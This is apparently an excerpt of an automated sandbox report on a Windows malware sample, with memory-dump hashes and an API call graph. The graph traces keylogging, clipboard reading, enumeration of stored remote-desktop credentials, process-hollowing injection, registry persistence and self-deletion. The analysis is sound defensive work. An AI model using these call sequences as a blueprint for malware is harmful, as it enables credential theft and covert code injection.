                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Cred$EnumerateFree
                                                • String ID: TERMSRV/*
                                                • API String ID: 3403564193-275249402
                                                • Opcode ID: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                                • Instruction ID: 46919d1b78b4c4f98928751ff711c86717132dd267c8420e9221b8d9fce6a23c
                                                • Opcode Fuzzy Hash: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                                • Instruction Fuzzy Hash: 91112731804204EBDF319F94C9887DABBB4AF05705F14827BA501721E0C379AF85DB89
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2305246544.0000000000198000.00000004.00000010.00020000.00000000.sdmp, Offset: 00198000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_198000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b5445beca90ee569798089d0d7018d29cce4fce22433cfcfbce372238ad2ec6
                                                • Instruction ID: e51ce522a023acdf34c7b6de1136991aab78b3978f78d66ed21dc44c61298d8c
                                                • Opcode Fuzzy Hash: 3b5445beca90ee569798089d0d7018d29cce4fce22433cfcfbce372238ad2ec6
                                                • Instruction Fuzzy Hash: 79C04C7689E3C18ED75357744C240543FB55D4751976A51DFC091CF4E3C51A140BDB13

                                                Execution Graph

                                                Execution Coverage:3.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:11.4%
                                                Total number of Nodes:1181
                                                Total number of Limit Nodes:2
execution_graph
401b94 ??2@YAPAXI 5749->5751 5750->5751 5751->5726 5755 401ba0 5752->5755 5756 401bad 5755->5756 5757 401bb3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5756->5757 5758 401b72 5756->5758 5757->5758 5758->5728 5762 401bc8 5759->5762 5765 401bd7 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5762->5765 5766 401be9 5765->5766 5768 401b83 5765->5768 5769 4127a4 free 5766->5769 5768->5736 5769->5768 5770->5741 5772 4097cf 5771->5772 5773 4097d4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 5772->5773 5774 4096b0 5772->5774 5773->5772 5774->5338 5780 401305 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 5775->5780 5777 401300 5781 41282a 5777->5781 5780->5777 5784 4127fe 5781->5784 5783 401324 5783->5357 5785 412813 __dllonexit 5784->5785 5786 412807 _onexit 5784->5786 5785->5783 5786->5783 5788 40ad60 5787->5788 5789 40ad64 RegDeleteValueW 5787->5789 5788->5367 5789->5367 5791 409e13 5790->5791 5792 4119ab GetFileSize ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ReadFile 5790->5792 5791->5375 5791->5376 5793 4119e0 5792->5793 5794 4119e2 CloseHandle 5792->5794 5793->5794 5794->5791 5796 40abc7 5795->5796 5797 40ab9d RegSetValueExA RegCloseKey 5795->5797 5796->5403 5797->5403 5799 411907 CreateFileW 5798->5799 5801 411941 5799->5801 5802 411945 5799->5802 5801->5403 5803 41195b WriteFile 5802->5803 5804 41194b SetFilePointer 5802->5804 5805 411973 CloseHandle 5803->5805 5806 411971 5803->5806 5804->5803 5804->5805 5805->5801 5806->5805 5808 407169 5807->5808 5809 40712b ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5807->5809 5810 4071ad 5808->5810 5811 40716f 
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5808->5811 5828 40ab16 RegCreateKeyW 5809->5828 5815 4071b3 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5810->5815 5816 407225 5810->5816 5814 40ab16 7 API calls 5811->5814 5813 40715d ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5813->5808 5817 4071a1 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5814->5817 5818 40ab16 7 API calls 5815->5818 5819 40722b ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5816->5819 5820 40729d 5816->5820 5817->5810 5821 407207 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5818->5821 5822 40ab16 7 API calls 5819->5822 5823 4072e1 5820->5823 5824 4072a3 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5820->5824 5821->5816 5825 40727f ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5822->5825 5823->5393 5826 40ab16 7 API calls 5824->5826 5825->5820 5827 
4072d5 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5826->5827 5827->5823 5829 40ab79 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5828->5829 5830 40ab2d ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RegSetValueExW RegCloseKey 5828->5830 5829->5813 5831 40ab68 5830->5831 5832 40ab6a ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5830->5832 5831->5832 5832->5813 5833->5416 5835 401285 5834->5835 5836 40123f 5834->5836 5835->5422 5837 401289 6 API calls 5836->5837 5838 401252 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 5837->5838 5839 401261 exit 5838->5839 5840 401269 5838->5840 5839->5840 5841 401289 6 API calls 5840->5841 5842 401277 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 5841->5842 5842->5835 5843 401280 5842->5843 5848 40770c 5843->5848 5845->5429 5847 401094 5846->5847 5847->5439 5847->5441 5893 40a109 TerminateProcess WaitForSingleObject 5848->5893 5850 40771d 5851 407730 5850->5851 5894 406079 TerminateThread 5850->5894 5853 40773e 5851->5853 5899 4100c6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5851->5899 5854 407747 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5853->5854 5858 407758 5853->5858 5902 41178f wcscpy wcscat wcscpy wcscat FindFirstFileW 5854->5902 5857 40776c ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5859 40ad45 2 API calls 5857->5859 5858->5857 5862 40777f 5858->5862 5859->5862 5860 407790 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5863 40ad45 2 API calls 5860->5863 5861 4077a3 5864 4077b4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5861->5864 5865 4077d6 5861->5865 5862->5860 5862->5861 5863->5861 5917 40aa65 RegCreateKeyA 5864->5917 5866 4077e2 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5865->5866 5867 407804 5865->5867 5869 40aa65 7 API calls 5866->5869 5870 407810 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5867->5870 5871 40782a ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5867->5871 5869->5867 5872 40ad45 2 API calls 5870->5872 5873 40a9ef 3 API calls 5871->5873 5874 407827 5872->5874 5875 407880 5873->5875 5874->5871 5876 407887 GetModuleFileNameW 5875->5876 5877 407899 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegDeleteKeyA 5875->5877 5878 4078a9 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5876->5878 5877->5878 5879 4078c7 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 5878->5879 5880 4078de SetFileAttributesW 5878->5880 5879->5880 5881 4078f4 5880->5881 5882 4078f7 7 API calls 5880->5882 5881->5882 5883 4079bc 7 API calls 5882->5883 5884 40795f 7 API calls 5882->5884 5885 407a2d ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5883->5885 5886 407a1f ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 5883->5886 5884->5883 5887 407a77 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5885->5887 5888 407a37 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 
??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5885->5888 5886->5885 5889 4118f7 4 API calls 5887->5889 5888->5887 5890 407aad 5889->5890 5891 407ab4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 5890->5891 5892 407acd exit 5890->5892 5891->5892 5893->5850 5895 406096 UnhookWindowsHookEx TerminateThread 5894->5895 5896 4060a9 5894->5896 5895->5896 5922 406037 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ DeleteFileW ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5896->5922 5900 41178f 18 API calls 5899->5900 5901 4100d7 5900->5901 5901->5853 5903 4117fe wcscpy 5902->5903 5905 4118e5 5902->5905 5904 41181a FindNextFileW 5903->5904 5906 4118be GetLastError 5904->5906 5911 411832 5904->5911 5905->5858 5907 4118ea FindClose 5906->5907 5906->5911 5907->5905 5909 4118d7 FindClose RemoveDirectoryW 5909->5905 5910 411847 wcscat 5910->5911 5911->5904 5911->5907 5911->5909 5911->5910 5912 411899 SetFileAttributesW 5911->5912 5913 4118ab DeleteFileW 5911->5913 5914 41178f 2 API calls 5911->5914 5915 411873 RemoveDirectoryW 5911->5915 5916 41187c wcscpy 5911->5916 5925 41175b wcscmp 5911->5925 5912->5913 5913->5907 5913->5911 5914->5911 5915->5916 5916->5911 5918 40aac4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5917->5918 5919 40aa7c ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegSetValueExA RegCloseKey 5917->5919 5918->5865 5920 40aab3 5919->5920 5921 40aab5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5919->5921 5920->5921 5921->5865 5923 406074 5922->5923 5924 406065 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RemoveDirectoryW 5922->5924 5923->5851 5924->5923 5926 411775 wcscmp 5925->5926 5927 411785 5925->5927 5926->5927 5927->5911 5938 
4011e5 FindWindowA 5928->5938 5930 40121b 5931 401227 Sleep 5930->5931 5932 401234 105 API calls 5930->5932 5931->5928 5932->5930 5939 4011d2 FindWindowA 5933->5939 5935 401209 Sleep 5935->5933 5936 401234 105 API calls 5937 4011fd 5936->5937 5937->5935 5937->5936 5938->5930 5939->5937 5940->5481 5941->5491 5943 41133c ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5942->5943 5943->5230 5945 4116dd ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 5944->5945 5945->5564 5948 411686 OpenProcess 5947->5948 5949 40924b 5947->5949 5948->5949 5949->5571 5949->5574 5958 40a8ff RegOpenKeyExW 5950->5958 5952 410e9a ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 5962 41146f ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI 5952->5962 5954 410ef5 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5954->5546 5966 40ede9 5955->5966 5959 40a92a RegQueryValueExW RegCloseKey 5958->5959 5960 40a95b 5958->5960 5961 40a964 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 5959->5961 5960->5961 5961->5952 5963 4114ca ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 5962->5963 5964 41148f ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 
?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5962->5964 5965 4114d7 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5963->5965 5964->5965 5965->5954 5982 412850 5966->5982 5968 40edf3 GetModuleHandleA GetProcAddress 5969 40ee2b 5968->5969 5970 40933c 5968->5970 5969->5970 5971 40ee3f CreateProcessW 5969->5971 5970->5562 5970->5563 5971->5970 5972 40ee72 VirtualAlloc GetThreadContext 5971->5972 5972->5970 5973 40ee9f ReadProcessMemory 5972->5973 5973->5970 5974 40eec1 VirtualAllocEx 5973->5974 5974->5970 5976 40eeef WriteProcessMemory 5974->5976 5976->5970 5977 40ef0a 5976->5977 5978 40ef17 WriteProcessMemory 5977->5978 5979 40ef4b WriteProcessMemory 5977->5979 5978->5977 5979->5970 5980 40ef68 SetThreadContext 5979->5980 5980->5970 5981 40ef85 ResumeThread 5980->5981 5981->5970 5982->5968 5986 404748 5983->5986 5990 404762 5986->5990 5987 401289 6 API calls 5988 40478b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5987->5988 5999 411b14 GetForegroundWindow GetWindowTextLengthA 5988->5999 5990->5987 5991 4047a3 Sleep 5990->5991 5992 4047ac 8 API calls 5990->5992 5994 401289 6 API calls 5990->5994 5997 404845 Sleep 5990->5997 6017 4050a8 5990->6017 5991->5990 5993 4044ed 148 API calls 5992->5993 5993->5990 5995 40482d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5994->5995 5996 411b14 43 API calls 5995->5996 5996->5990 5997->5990 6000 411b33 7 API calls 5999->6000 6001 411c04 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5999->6001 6026 41235c 6000->6026 6003 411c0f 6001->6003 6003->5990 6005 411550 20 API calls 6012 411bb1 6005->6012 6006 411bf3 6007 401ad8 2 API calls 6006->6007 6009 411bfb 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6007->6009 6008 401289 6 API calls 6010 411bcf ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 6008->6010 6009->6001 6011 411c13 6010->6011 6010->6012 6013 411c42 6011->6013 6014 411c19 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6011->6014 6012->6006 6012->6008 6015 401ad8 2 API calls 6013->6015 6014->6013 6016 411c4a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6015->6016 6016->6003 6018 4050b8 6017->6018 6021 405121 6017->6021 6019 4050c6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6018->6019 6020 4050de ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6018->6020 6028 40512c 7 API calls 6019->6028 6032 410cd2 6020->6032 6021->5990 6024 405107 6024->6021 6025 405118 UnhookWindowsHookEx 6024->6025 6025->6021 6027 411b88 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6026->6027 6027->6005 6029 4051ca ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD SetEvent 6028->6029 6030 4051bf ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 6028->6030 6031 4051dc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6029->6031 6030->6031 6031->6020 6033 410d83 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6032->6033 6034 410ce5 11 API calls 6032->6034 6033->6024 6034->6033 6036 4044db 6035->6036 6036->5587 6036->5588 6046 404955 6037->6046 6097 404d2c 6040->6097 6135 404643 6043->6135 6047 404970 Sleep 6046->6047 6081 
4048a0 6047->6081 6050 404997 ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6052 4049a6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CreateDirectoryW 6050->6052 6053 4049ba ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ GetFileAttributesW 6050->6053 6051 404603 6052->6053 6054 4049d0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 6053->6054 6055 4049e4 6053->6055 6054->6055 6056 401289 6 API calls 6055->6056 6057 4049ed ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6056->6057 6058 4049fa ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6057->6058 6059 404a2c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6057->6059 6060 4118f7 4 API calls 6058->6060 6092 402ebe 6059->6092 6062 404a24 6060->6062 6064 404b38 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 6062->6064 6063 404a5c ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ PathFileExistsW 6065 404ad3 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6063->6065 6066 404a6f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6063->6066 6067 401289 6 API calls 6064->6067 6069 402fc1 4 API calls 6065->6069 6068 411980 6 API calls 6066->6068 6070 404b4e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6067->6070 6071 404a8e 6068->6071 
6072 404b06 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6069->6072 6074 404b5b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 6070->6074 6075 404b6c 6070->6075 6076 404a94 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6071->6076 6077 404aca ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6071->6077 6094 4119ef ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6072->6094 6074->6075 6075->6047 6075->6051 6079 402fc1 4 API calls 6076->6079 6077->6065 6078 404b23 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6078->6064 6080 404ab7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6079->6080 6080->6077 6082 404951 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6081->6082 6084 4048b6 6081->6084 6082->6050 6082->6075 6083 4048bb ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CreateFileW 6083->6084 6085 4048e4 GetFileSize 6083->6085 6084->6083 6086 40491b CloseHandle 6084->6086 6087 40492d 6084->6087 6088 404910 Sleep 6084->6088 6090 4050a8 28 API calls 6084->6090 6085->6084 6085->6086 6086->6084 6087->6082 6089 40493b ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 6087->6089 6088->6086 6091 4044ed 142 API calls 6089->6091 6090->6088 6091->6082 6093 402ecf 6092->6093 6093->6063 6095 4118f7 4 API calls 6094->6095 6096 411a11 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6095->6096 6096->6078 6108 404d3e 6097->6108 6098 404612 6099 404d5a 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 6102 41282a 2 API calls 6099->6102 6100 404d7b Sleep GetForegroundWindow GetWindowTextLengthA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@ 6101 404dae ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GetWindowTextA ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 6100->6101 6100->6108 6103 404dde ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 6101->6103 6101->6108 6102->6108 6115 404857 6103->6115 6106 404e36 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6106->6108 6107 404eeb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6107->6108 6108->6098 6108->6099 6108->6100 6108->6107 6109 404ef9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6108->6109 6110 411200 GetLastInputInfo GetTickCount 6108->6110 6111 404e82 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 6108->6111 6112 404e76 Sleep 6108->6112 6120 405f6d 6108->6120 6109->6098 6110->6108 6113 404857 4 API calls 6111->6113 6112->6108 6114 404ed9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6113->6114 6114->6107 6116 404870 6115->6116 6117 404863 
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 6115->6117 6118 404876 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ SetEvent 6116->6118 6119 40488c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6116->6119 6117->6116 6118->6119 6119->6106 6121 405f86 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 6120->6121 6125 405fa3 6120->6125 6123 41282a 2 API calls 6121->6123 6123->6125 6124 405faf ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 6126 405fc5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6124->6126 6127 40601e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6124->6127 6131 405f27 OpenClipboard 6125->6131 6126->6127 6128 405fe6 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 6126->6128 6127->6108 6129 404857 4 API calls 6128->6129 6130 406015 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6129->6130 6130->6127 6132 405f4c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6131->6132 6133 405f38 GetClipboardData CloseClipboard 6131->6133 6132->6124 